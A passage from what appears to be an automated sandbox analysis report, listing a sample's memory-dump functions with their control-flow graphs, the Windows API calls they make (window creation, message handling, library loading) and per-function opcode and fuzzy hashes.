                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009DF68A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 4cf054eb3f288b021f787e47532896666f47cefaf0b590e6b19b0696170210d4
                                                • Instruction ID: ca0aa07d2e726cbad75a0760f4af7d01f640aaf0c4ba5de2089b8bf20ebc2de5
                                                • Opcode Fuzzy Hash: 4cf054eb3f288b021f787e47532896666f47cefaf0b590e6b19b0696170210d4
                                                • Instruction Fuzzy Hash: 56511FB1C04349AFDB11CFA9C890ADEBFB5FF49304F25866AE409AB211D7709885CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009DD33C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 429 9dd33c-9df5de 431 9df5e9-9df5f0 429->431 432 9df5e0-9df5e6 429->432 433 9df5fb-9df69a CreateWindowExW 431->433 434 9df5f2-9df5f8 431->434 432->431 436 9df69c-9df6a2 433->436 437 9df6a3-9df6db 433->437 434->433 436->437 441 9df6dd-9df6e0 437->441 442 9df6e8 437->442 441->442 443 9df6e9 442->443 443->443
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009DF68A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 3c8e1c16d9b4ebf85db44fe2f137710a85de073ea8fa44273f230f2eb8ee8804
                                                • Instruction ID: 7dd9af9114fb8759040ab1f6b97ea716b09c6ad876375c88aaea2b0f611d9a84
                                                • Opcode Fuzzy Hash: 3c8e1c16d9b4ebf85db44fe2f137710a85de073ea8fa44273f230f2eb8ee8804
                                                • Instruction Fuzzy Hash: 2551D0B1D00309AFDB14CF99D885ADEBBB5FF48314F64822AE419AB310D775A845CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009DF56C Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 444 9df56c-9df5de 445 9df5e9-9df5f0 444->445 446 9df5e0-9df5e6 444->446 447 9df5fb-9df633 445->447 448 9df5f2-9df5f8 445->448 446->445 449 9df63b-9df69a CreateWindowExW 447->449 448->447 450 9df69c-9df6a2 449->450 451 9df6a3-9df6db 449->451 450->451 455 9df6dd-9df6e0 451->455 456 9df6e8 451->456 455->456 457 9df6e9 456->457 457->457
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 009DF68A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 6fdb9eeb56dadbf3c62269019f80cf0655fc9ad963cf63aa7a351a0767f1c712
                                                • Instruction ID: edb87093488bff341a453728994a204276110e5f3447a00e8831294f8bb1e579
                                                • Opcode Fuzzy Hash: 6fdb9eeb56dadbf3c62269019f80cf0655fc9ad963cf63aa7a351a0767f1c712
                                                • Instruction Fuzzy Hash: 3C51EEB1D00308EFDB14CFA9D881ADEBBB5FF48314F64812AE419AB210D775A885CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06CE13B0 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 458 6ce13b0-6ce13b1 459 6ce1364-6ce1375 458->459 460 6ce13b3-6ce142a KiUserCallbackDispatcher 458->460 465 6ce137e-6ce139f 459->465 466 6ce1377-6ce137d 459->466 461 6ce142c-6ce1432 460->461 462 6ce1433-6ce1454 460->462 461->462 466->465
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 06CE141D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: c1d6e91ecfe21b66f12080a6f73a8452d42e309d52f6134a1831b0898bbe5820
                                                • Instruction ID: 72463f1eb808180535bdaf2b943f1cbf23c651e42efe4eb98f5f402bc375dc0e
                                                • Opcode Fuzzy Hash: c1d6e91ecfe21b66f12080a6f73a8452d42e309d52f6134a1831b0898bbe5820
                                                • Instruction Fuzzy Hash: 212137B2D043498FDB10CF99D844BEEFBF4EB58324F14842AE559A3640C378A655DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06AC4DB0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 468 6ac4db0-6ac4db4 469 6ac4db6-6ac4df8 468->469 470 6ac4d81-6ac4d94 call 6ac4228 468->470 471 6ac4dfa-6ac4dfd 469->471 472 6ac4e00-6ac4e2f SetWindowTextW 469->472 479 6ac4d99-6ac4da0 470->479 471->472 474 6ac4e38-6ac4e59 472->474 475 6ac4e31-6ac4e37 472->475 475->474
                                                APIs
                                                • SetWindowTextW.USER32(?,00000000), ref: 06AC4E22
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID:
                                                • API String ID: 530164218-0
                                                • Opcode ID: c9cefa1267ed60e7a7f57eab8976b2dc0ca1f113ad8fe38d754ed3fb1827649a
                                                • Instruction ID: 3617db7ce584fc8d5ee11d3b85fb576922215cec931647c6bb94223d313c656a
                                                • Opcode Fuzzy Hash: c9cefa1267ed60e7a7f57eab8976b2dc0ca1f113ad8fe38d754ed3fb1827649a
                                                • Instruction Fuzzy Hash: BB214A72D002098BDB20DF9AD844AEEFBF4EF88224F05846ED429A7640D734A546CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009D9020 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 480 9d9020-9db30c DuplicateHandle 482 9db30e-9db314 480->482 483 9db315-9db332 480->483 482->483
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,009DB23E,?,?,?,?,?), ref: 009DB2FF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 83bb2102bdc3760dbd6a423a2a4eda03b1f04527411454b8407e8b4d31d453c7
                                                • Instruction ID: ecd3a1bcdf380197d9d79b373985a0f5a1c93fa9ebf4bdd504b703915b4de03c
                                                • Opcode Fuzzy Hash: 83bb2102bdc3760dbd6a423a2a4eda03b1f04527411454b8407e8b4d31d453c7
                                                • Instruction Fuzzy Hash: D52105B5901208EFDB10CF9AD884AEEFBF8EB48324F15841AE915A3310D374A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009DB270 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 486 9db270-9db30c DuplicateHandle 487 9db30e-9db314 486->487 488 9db315-9db332 486->488 487->488
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,009DB23E,?,?,?,?,?), ref: 009DB2FF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: d9e1c9c6f257edd2b6f3b9ab5a94988ffb69e6c5c2df28d40d300dab261263b6
                                                • Instruction ID: b49e905af18cbdc47cedffcb8fe2ff09e4b3670f1b153e3f56bcdc7d1e090c15
                                                • Opcode Fuzzy Hash: d9e1c9c6f257edd2b6f3b9ab5a94988ffb69e6c5c2df28d40d300dab261263b6
                                                • Instruction Fuzzy Hash: 072122B5901208DFCB00CFA9D484AEEFBF4EB48324F14842AE954A3310D334A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06CE10E2 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,?,?,?,?), ref: 06CE1150
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePeek
                                                • String ID:
                                                • API String ID: 2222842502-0
                                                • Opcode ID: 424b4c30a502adf6c45257a1c4fa8fe46bc009c62a52300bcc8334622a7dd097
                                                • Instruction ID: 9930ec855b4c85429bae60edfc2d13320c3d5e7e666d9cbde7a5994d3098f634
                                                • Opcode Fuzzy Hash: 424b4c30a502adf6c45257a1c4fa8fe46bc009c62a52300bcc8334622a7dd097
                                                • Instruction Fuzzy Hash: BE110AB5C002499FDB10CF9AD844BDEFBF8FB58364F148429E555A3640C374A555CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009D8C94 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009D9329,00000800,00000000,00000000), ref: 009D953A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 6fed9c04d0edba1d0bdeb730569a6ee17804bbce289d05272eeccc0986be8df2
                                                • Instruction ID: 854622d428d9926a1655134a793d45ed7c507b3ef66a166d8914ceae946a1ea1
                                                • Opcode Fuzzy Hash: 6fed9c04d0edba1d0bdeb730569a6ee17804bbce289d05272eeccc0986be8df2
                                                • Instruction Fuzzy Hash: 4211F2B69002089FDB20DF9AD844BDEFBF8EB48324F14842AE915A7300C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009D7758 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 009D77CD
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: de0b7a0ac4333b659589f6c829aea3e0671629429e9d958abbf3801078d40f07
                                                • Instruction ID: da7f5d89676515e0e0c59c1fd25d010677372050bfeeee7b1cef5e0e271a120a
                                                • Opcode Fuzzy Hash: de0b7a0ac4333b659589f6c829aea3e0671629429e9d958abbf3801078d40f07
                                                • Instruction Fuzzy Hash: 9321AEB18043958FDB11CF98C4087EABFF8EF05314F1484AED041A7242D7789A48CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06AC4DB8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowTextW.USER32(?,00000000), ref: 06AC4E22
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID:
                                                • API String ID: 530164218-0
                                                • Opcode ID: bcdc07a221790cab174ddde682e263f9eba3a6875cb7101eb4bb3d3d89930041
                                                • Instruction ID: 95aebe9da584cb0af8df813c08a7ef76411b0d77e3dd37ca2edfa3c7b3faca73
                                                • Opcode Fuzzy Hash: bcdc07a221790cab174ddde682e263f9eba3a6875cb7101eb4bb3d3d89930041
                                                • Instruction Fuzzy Hash: C311D3B2D002498FDB20CF9AD844BDEBBF4EB89324F15842AD865A7640D378A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06CE10E8 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,?,?,?,?), ref: 06CE1150
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePeek
                                                • String ID:
                                                • API String ID: 2222842502-0
                                                • Opcode ID: 1830cbebde1c2d87dc62887cde93e5381d5d709e160c2f101c6f354aa182c6cd
                                                • Instruction ID: 73fae78a0f3cab56100f38543c57bc846cb24157a396293786a5d1d07d14de1b
                                                • Opcode Fuzzy Hash: 1830cbebde1c2d87dc62887cde93e5381d5d709e160c2f101c6f354aa182c6cd
                                                • Instruction Fuzzy Hash: 5B1107B1C002499FDB10CF9AD884BDEFBF8FB48324F04842AE555A3640C378A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009D94CA Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,009D9329,00000800,00000000,00000000), ref: 009D953A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: aa516489e99556d7e7e1b04f957bab371c8238165cf1fc04aaf2d6eee14f02f7
                                                • Instruction ID: b738da16231fdb5940268dc5306a07324cfb0d1a1fd81630946a42398bb66ce8
                                                • Opcode Fuzzy Hash: aa516489e99556d7e7e1b04f957bab371c8238165cf1fc04aaf2d6eee14f02f7
                                                • Instruction Fuzzy Hash: 1C11F2B29002099FCB10DF9AD444BDEFBF4AF88314F15842AE915A7600C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06CE13B8 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 06CE141D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: d2ca735c5787c263eb2df0034961e14e04f8d0beec5026c21871826ec28b9615
                                                • Instruction ID: 014c4b314d2f902a936473eeb9f7362f4bd4f4128fb191a5fd2f03929a88e644
                                                • Opcode Fuzzy Hash: d2ca735c5787c263eb2df0034961e14e04f8d0beec5026c21871826ec28b9615
                                                • Instruction Fuzzy Hash: 8B1107B1D003499FDB10CF9AD844BDEFBF8EB48324F04842AE515A3600C378A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06ACA921 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06ACA985
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: cf944366239980cb8646afc2ff99858b124ea6e0f700c3c8994f9828a13e5aab
                                                • Instruction ID: 11191814ae46724425e14efd2066f4b66c96b3fe244557763cf3cffde6fe90f8
                                                • Opcode Fuzzy Hash: cf944366239980cb8646afc2ff99858b124ea6e0f700c3c8994f9828a13e5aab
                                                • Instruction Fuzzy Hash: D31125B28002499FDB10CF99C885BEFFBF8EF48324F14845AE555A7601C379A984CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009D7768 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 009D77CD
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 926a53eadc740680583cc611771fe906b9ed66f96d0e0aec94473cbc49994b69
                                                • Instruction ID: bbcef9a8203a83520930b36f9c60c5beab086971f76665b4bdb73e49a749e053
                                                • Opcode Fuzzy Hash: 926a53eadc740680583cc611771fe906b9ed66f96d0e0aec94473cbc49994b69
                                                • Instruction Fuzzy Hash: 3D119AB1C043998FDB10CF99D4087EABFF8EB05314F54886ED455A3241D7B9AA48CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06ACA928 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06ACA985
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 483efec1efd6b2b06814e091baa15fc573a83262196ac1cf0c08e49f2bdc0f9c
                                                • Instruction ID: 0efbf1882eaf5e1e3cb62b0731d4eb9b9098fde1f8b8d3f4eaf059b58dd7128f
                                                • Opcode Fuzzy Hash: 483efec1efd6b2b06814e091baa15fc573a83262196ac1cf0c08e49f2bdc0f9c
                                                • Instruction Fuzzy Hash: BC1118B18003499FDB10CF9AC845BEEFBF8EF58324F148419E554A3640D379A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009D9248 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 009D92AE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.573394913.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_9d0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: e4e6e655b803e452596908decd808d0cf5f148414d0dcb8cfa841b0242ac1e0d
                                                • Instruction ID: 2ccc35a0c7d62c8aabf01fb478d7a7a2636d932853d59c23b1bde38ee7c9baee
                                                • Opcode Fuzzy Hash: e4e6e655b803e452596908decd808d0cf5f148414d0dcb8cfa841b0242ac1e0d
                                                • Instruction Fuzzy Hash: 4411F0B5C002499BCB20CF9AC444BDEFBF8AB88324F14842AD529A7200C375A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06CE1C88 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DispatchMessage
                                                • String ID:
                                                • API String ID: 2061451462-0
                                                • Opcode ID: 4623a1835f217659de56fda47755d1268f003d323a3a05401da793c1449674d4
                                                • Instruction ID: 3253c0fa344d67044206c0bb4145ce756563f18896e3683793e8107cbf4a9ca2
                                                • Opcode Fuzzy Hash: 4623a1835f217659de56fda47755d1268f003d323a3a05401da793c1449674d4
                                                • Instruction Fuzzy Hash: B811F2B5D002498FCB10DF9AD488BDEFBF4EF48324F14856AE419A3600D3786645CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06AC6200 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,?,?,?), ref: 06AC625D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 9f3f68c4b6051882eaa1728f731de79f9aea7a40fa434bea1d49da67784b0920
                                                • Instruction ID: 4e2979ca53274d510d3862f9e45de659f3d885b220fe5a741c15a299db1ee1fa
                                                • Opcode Fuzzy Hash: 9f3f68c4b6051882eaa1728f731de79f9aea7a40fa434bea1d49da67784b0920
                                                • Instruction Fuzzy Hash: E711E5B5C003499FDB20DF99D884BDEFBF8EB58324F14845AE515A7200C375A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06AC61FF Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,?,?,?), ref: 06AC625D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.578829510.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ac0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c151b3e38bc02b558f9b5bc7d819bbaef3cfc0f6f11c59a41017c8cc7654e72c
                                                • Instruction ID: 48c7a4433d8afbb83fcfd29e3b8b7ff064e588f907b07c172fb8a706a1b456bb
                                                • Opcode Fuzzy Hash: c151b3e38bc02b558f9b5bc7d819bbaef3cfc0f6f11c59a41017c8cc7654e72c
                                                • Instruction Fuzzy Hash: D211D3B5C002499FDB20DF99D884BDEBBF8EB58324F14845AE519A7200C375A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06CE1C90 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DispatchMessage
                                                • String ID:
                                                • API String ID: 2061451462-0
                                                • Opcode ID: bf4d1c4c939c24795c904eadbbb6a3ee813887d35e9bfbcf071e7c7e01cb8e8c
                                                • Instruction ID: f3a8d0d1aefd0b01ef8d2054fdfb8ec03d3a2b5f913313a7ea4c584bee7818e3
                                                • Opcode Fuzzy Hash: bf4d1c4c939c24795c904eadbbb6a3ee813887d35e9bfbcf071e7c7e01cb8e8c
                                                • Instruction Fuzzy Hash: D511E2B5D046499FCB20DF9AD844BDEFBF4EF48324F14852AE419A3600D378A645CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06CE1460 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 06CE141D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.579055688.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6ce0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: aa44d640adc9b9db3281d2bb24a21e11cd769ab8d36fe4f0c037b632e317f8dd
                                                • Instruction ID: 7e7cb64900f7980834abe74df66ce85875dcf1794f75706265be896316418680
                                                • Opcode Fuzzy Hash: aa44d640adc9b9db3281d2bb24a21e11cd769ab8d36fe4f0c037b632e317f8dd
                                                • Instruction Fuzzy Hash: A4F05973D0A3848ED721A725D8043DEBBE49F61265F1AC4ABC194C36A3E3389149DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0061D3C8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.571968067.000000000061D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0061D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_61d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc5434ed8943bf9a9f1490623a7da57deacecbf577486b7168105cb5fc7eccf1
                                                • Instruction ID: 80df28a5b46892f3a188a2102fae99af280362162cf45d7b8374e5b71e9561a8
                                                • Opcode Fuzzy Hash: fc5434ed8943bf9a9f1490623a7da57deacecbf577486b7168105cb5fc7eccf1
                                                • Instruction Fuzzy Hash: 8C213D71504240DFDB14DF10D9C4FA6BBA6FB84324F28C56DD9054B346C336E896C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0074D1D4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.572097516.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_74d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 571ceca1bd421d1eccf9650c6ead679b861cd1fc0fb770129e74e2217bc8a277
                                                • Instruction ID: 3bef52e497b88966d9a083b3f6f1f07b1fffd80d208a5b3487d751b31b8b0887
                                                • Opcode Fuzzy Hash: 571ceca1bd421d1eccf9650c6ead679b861cd1fc0fb770129e74e2217bc8a277
                                                • Instruction Fuzzy Hash: FE2107B1604204DFDB25CF50D9C4F26BBA5FB88328F24C66DE9894B242C37ADC46CA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0074D01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.572097516.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_74d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 402a02647e19cb3a3a11452e14b4a3fcebfcf5d4d3c2909cc108e455123061b9
